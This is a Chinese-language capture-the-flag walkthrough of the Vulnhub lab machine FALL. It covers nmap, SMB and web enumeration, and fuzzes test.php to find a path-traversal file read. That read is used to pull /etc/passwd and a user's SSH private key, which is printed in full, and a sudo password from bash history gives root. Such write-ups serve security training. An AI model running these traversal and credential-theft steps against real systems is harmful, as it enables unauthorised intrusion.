Vulnhub之FALL靶机详细测试过程
FALL
作者:jason_huawen
靶机信息
名称:digitalworld.local: FALL
地址:
https://www.vulnhub.com/entry/digitalworldlocal-fall,726/
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:6e:c6:23 1 60 PCS Systemtechnik GmbH
192.168.56.182 08:00:27:cc:ee:26 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.182
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.182 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-06 00:48 EST
Nmap scan report for localhost (192.168.56.182)
Host is up (0.00076s latency).
Not shown: 65372 filtered tcp ports (no-response), 150 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey:
| 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
| 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-title: Good Tech Inc's Fall Sales - Home
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry
|_/
111/tcp closed rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after: 2020-08-19T05:31:33
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open http Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://localhost:9090/
10080/tcp closed amanda
10443/tcp closed cirrossp
MAC Address: 08:00:27:CC:EE:26 (Oracle VirtualBox virtual NIC)
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.8.10)
| Computer name: fall
| NetBIOS computer name: FALL\x00
| Domain name: \x00
| FQDN: fall
|_ System time: 2023-02-06T05:26:34-08:00
|_clock-skew: mean: 10h15m25s, deviation: 4h37m07s, median: 7h35m25s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-06T13:26:36
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.94 seconds
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ smbclient -L 192.168.56.182
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.8.10)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
SAMBA FALL
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ enum4linux 192.168.56.182
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Feb 6 00:52:45 2023
=========================================( Target Information )=========================================
Target ........... 192.168.56.182
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.182 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 192.168.56.182 )===============================
Looking up status of 192.168.56.182
No reply from 192.168.56.182
==================================( Session Check on 192.168.56.182 )==================================
[+] Server 192.168.56.182 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.56.182 )===============================
Domain Name: SAMBA
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.56.182 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.56.182 from srvinfo:
FALL Wk Sv PrQ Unx NT SNT Samba 4.8.10
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.56.182 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.56.182 )================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.8.10)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
SAMBA FALL
[+] Attempting to map shares on 192.168.56.182
//192.168.56.182/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.56.182/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.56.182 )===========================
[+] Attaching to 192.168.56.182 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] FALL
[+] Builtin
[+] Password Info for Domain: FALL
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.56.182 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.56.182 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-2245371042-1401206754-562280263 and logon username '', password ''
S-1-5-21-2245371042-1401206754-562280263-501 FALL\nobody (Local User)
S-1-5-21-2245371042-1401206754-562280263-513 FALL\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\qiu (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
==============================( Getting printer info for 192.168.56.182 )==============================
No printers returned.
enum4linux complete on Mon Feb 6 00:53:26 2023
enum4linux发现了用户名:qiu
浏览器访问80端口,从返回页面的内容得知:
- CMS: CMS Made Simple 2.2.15
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ searchsploit CMS Made Simple 2.2.15
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) | php/webapps/49199.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ curl http://192.168.56.182/robots.txt
# Group 1
User-agent: Googlebot
Allow: /
# Group 2:
User-agent: *
Disallow: /
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ nikto -h http://192.168.56.182
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.182
+ Target Hostname: 192.168.56.182
+ Target Port: 80
+ Start Time: 2023-02-06 00:59:17 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
+ Retrieved x-powered-by header: PHP/7.2.18
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie CMSSESSID19a99af5f4a4 created without the httponly flag
+ "robots.txt" contains 2 entries which should be manually viewed.
+ OpenSSL/1.1.0i-fips appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 9534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2023-02-06 01:00:06 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Perl/v5.26.3 mod_perl/2.0.10 Apache/2.4.39) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
访问/test木兰路,发现了邮箱:patrick@goodtech.inc
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ gobuster dir -u http://192.168.56.182 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.182
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: html,sh,txt,php
[+] Timeout: 10s
===============================================================
2023/02/06 01:03:54 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 214]
/index.php (Status: 200) [Size: 8385]
/modules (Status: 301) [Size: 238] [--> http://192.168.56.182/modules/]
/uploads (Status: 301) [Size: 238] [--> http://192.168.56.182/uploads/]
/doc (Status: 301) [Size: 234] [--> http://192.168.56.182/doc/]
/admin (Status: 301) [Size: 236] [--> http://192.168.56.182/admin/]
/assets (Status: 301) [Size: 237] [--> http://192.168.56.182/assets/]
/test.php (Status: 200) [Size: 80]
/lib (Status: 301) [Size: 234] [--> http://192.168.56.182/lib/]
/config.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 79]
/error.html (Status: 200) [Size: 80]
/tmp (Status: 301) [Size: 234] [--> http://192.168.56.182/tmp/]
/missing.html (Status: 200) [Size: 168]
/.html (Status: 403) [Size: 214]
/phpinfo.php (Status: 200) [Size: 17]
Progress: 1101301 / 1102805 (99.86%)
===============================================================
2023/02/06 01:10:14 Finished
===============================================================
访问/test.php文件,返回内容告知确实GET 参数,因此用WFUZZ工具FUZZ一下该参数名称
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ wfuzz -c -u http://192.168.56.182/test.php?FUZZ=test -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 7
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.182/test.php?FUZZ=test
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000759: 200 0 L 0 W 0 Ch "file"
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ curl http://192.168.56.182/test.php?file=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:996:991::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin
tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin
clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
确认用户名为qiu
看一下是否可以破解qiu的ssh密码:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ hydra -l qiu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.182
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 01:13:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.182:22/
[ERROR] target ssh://192.168.56.182:22/ does not support password authentication (method reply 36).
目标主机SSh不支持密码登录,因此放弃这个方向。
看一下是否有私钥文件?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ curl http://192.168.56.182/test.php?file=../../../../../home/qiu/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvNjhOFOSeDHy9K5vnHSs3qTjWNehAPzT0sD3beBPVvYKQJt0AkD0
FDcWTSSF13NhbjCQm5fnzR8td4sjJMYiAl+vAKboHne0njGkBwdy5PgmcXyeZTECIGkggX
61kImUOIqtLMcjF5ti+09RGiWeSmfIDtTCjj/+uQlokUMtdc4NOv4XGJbp7GdEWBZevien
qXoXtG6j7gUgtXX1Fxlx3FPhxE3lxw/AfZ9ib21JGlOyy8cflTlogrZPoICCXIV/kxGK0d
Zucw8rGGMc6Jv7npeQS1IXU9VnP3LWlOGFU0j+IS5SiNksRfdQ4mCN9SYhAm9mAKcZW8wS
vXuDjWOLEwAAA9AS5tRmEubUZgAAAAdzc2gtcnNhAAABAQC82OE4U5J4MfL0rm+cdKzepO
NY16EA/NPSwPdt4E9W9gpAm3QCQPQUNxZNJIXXc2FuMJCbl+fNHy13iyMkxiICX68Apuge
d7SeMaQHB3Lk+CZxfJ5lMQIgaSCBfrWQiZQ4iq0sxyMXm2L7T1EaJZ5KZ8gO1MKOP/65CW
iRQy11zg06/hcYlunsZ0RYFl6+J6epehe0bqPuBSC1dfUXGXHcU+HETeXHD8B9n2JvbUka
U7LLxx+VOWiCtk+ggIJchX+TEYrR1m5zDysYYxzom/uel5BLUhdT1Wc/ctaU4YVTSP4hLl
KI2SxF91DiYI31JiECb2YApxlbzBK9e4ONY4sTAAAAAwEAAQAAAQArXIEaNdZD0vQ+Sm9G
NWQcGzA4jgph96uLkNM/X2nYRdZEz2zrt45TtfJg9CnnNo8AhhYuI8sNxkLiWAhRwUy9zs
qYE7rohAPs7ukC1CsFeBUbqcmU4pPibUERes6lyXFHKlBpH7BnEz6/BY9RuaGG5B2DikbB
8t/CDO79q7ccfTZs+gOVRX4PW641+cZxo5/gL3GcdJwDY4ggPwbU/m8sYsyN1NWJ8NH00d
X8THaQAEXAO6TTzPMLgwJi+0kj1UTg+D+nONfh7xeXLseST0m1p+e9C/8rseZsSJSxoXKk
CmDy69aModcpW+ZXl9NcjEwrMvJPLLKjhIUcIhNjf4ABAAAAgEr3ZKUuJquBNFPhEUgUic
ivHoZH6U82VyEY2Bz24qevcVz2IcAXLBLIp+f1oiwYUVMIuWQDw6LSon8S72kk7VWiDrWz
lHjRfpUwWdzdWSMY6PI7EpGVVs0qmRC/TTqOIH+FXA66cFx3X4uOCjkzT0/Es0uNyZ07qQ
58cGE8cKrLAAAAgQDlPajDRVfDWgOWJj+imXfpGsmo81UDaYXwklzw4VM2SfIHIAFZPaA0
acm4/icKGPlnYWsvZCksvlUck+ti+J2RS2Mq9jmKB0AVZisFazj8qIde3SPPwtR7gBR329
JW3Db+KISMRIvdpJv+eiKQLg/epbSdwXZi0DJoB0a15FsIAQAAAIEA0uQl0d0p3NxCyT/+
Q6N+llf9TB5+VNjinaGu4DY6qVrSHmhkceHtXxG6h9upRtKw5BvOlSbTatlfMZYUtlZ1mL
RWCU8D7v1Qn7qMflx4bldYgV8lf18sb6g/uztWJuLpFe3Ue/MLgeJ+2TiAw9yYoPVySNK8
uhSHa0dvveoJ8xMAAAAZcWl1QGxvY2FsaG9zdC5sb2NhbGRvbWFpbgEC
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ curl http://192.168.56.182/test.php?file=../../../../../home/qiu/.ssh/id_rsa > id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1831 0 1831 0 0 355k 0 --:--:-- --:--:-- --:--:-- 447k
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ ls
id_rsa nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/FALL]
└─$ ssh -i id_rsa qiu@192.168.56.182
The authenticity of host '192.168.56.182 (192.168.56.182)' can't be established.
ED25519 key fingerprint is SHA256:EKK1u2kbhexzA1ZV6xNgdbmDeKiF8lfhmk+8sHl47DY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.182' (ED25519) to the list of known hosts.
Web console: https://FALL:9090/
Last login: Sun Sep 5 19:28:51 2021
[qiu@FALL ~]$ id
uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),10(wheel)
[qiu@FALL ~]$
成功得到了qiu的Shell
[qiu@FALL ~]$ cat local.txt
A low privilege shell! :-)
提权
[qiu@FALL html]$ cat config.php
<?php
# CMS Made Simple Configuration File
# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference
#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = '127.0.0.1';
$config['db_username'] = 'cms_user';
$config['db_password'] = 'P@ssw0rdINSANITY';
$config['db_name'] = 'cms_db';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'Asia/Singapore';
$config['db_port'] = 3306;
?>
[qiu@FALL html]$ sudo -l
[sudo] password for qiu:
Sorry, try again.
[sudo] password for qiu:
Sorry, try again.
[sudo] password for qiu:
sudo: 3 incorrect password attempts
[qiu@FALL html]$
[qiu@FALL ~]$ cat .bash_history
ls -al
cat .bash_history
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update
ifconfig
ping www.google.com
ps -aux
ps -ef | grep apache
env
env > env.txt
rm env.txt
lsof -i tcp:445
lsof -i tcp:80
ps -ef
lsof -p 1930
lsof -p 2160
rm .bash_history
exit
ls -al
cat .bash_history
exit
[qiu@FALL ~]$ sudo -l
[sudo] password for qiu:
Matching Defaults entries for qiu on FALL:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User qiu may run the following commands on FALL:
(ALL) ALL
[qiu@FALL ~]$ sudo /bin/bash
[root@FALL qiu]# cd /root
[root@FALL ~]# ls -alh
total 40K
dr-xr-x---. 3 root root 206 Sep 5 2021 .
dr-xr-xr-x. 17 root root 244 May 21 2021 ..
-rw-------. 1 root root 3.9K Aug 14 2019 anaconda-ks.cfg
-rw------- 1 root root 57 Sep 5 2021 .bash_history
-rw-r--r--. 1 root root 18 Feb 9 2018 .bash_logout
-rw-r--r--. 1 root root 176 Feb 9 2018 .bash_profile
-rw-r--r--. 1 root root 176 Feb 9 2018 .bashrc
-rw-r--r--. 1 root root 100 Feb 9 2018 .cshrc
-rw-------. 1 root root 3.1K Aug 14 2019 original-ks.cfg
---------- 1 root root 30 May 21 2021 proof.txt
-r-------- 1 root root 452 Aug 30 2021 remarks.txt
drwx------ 2 root root 25 Sep 5 2021 .ssh
-rw-r--r--. 1 root root 129 Feb 9 2018 .tcshrc
[root@FALL ~]# cat proof.txt
Congrats on a root shell! :-)
[root@FALL ~]#
在历史命令记录里有字符串,这个应该是qiu的密码
经验教训
- 需要仔细查看每个文件,包括本靶机中的.bash_history,否则就错过提权机会
STRIVE FOR PROGRESS,NOT FOR PERFECTION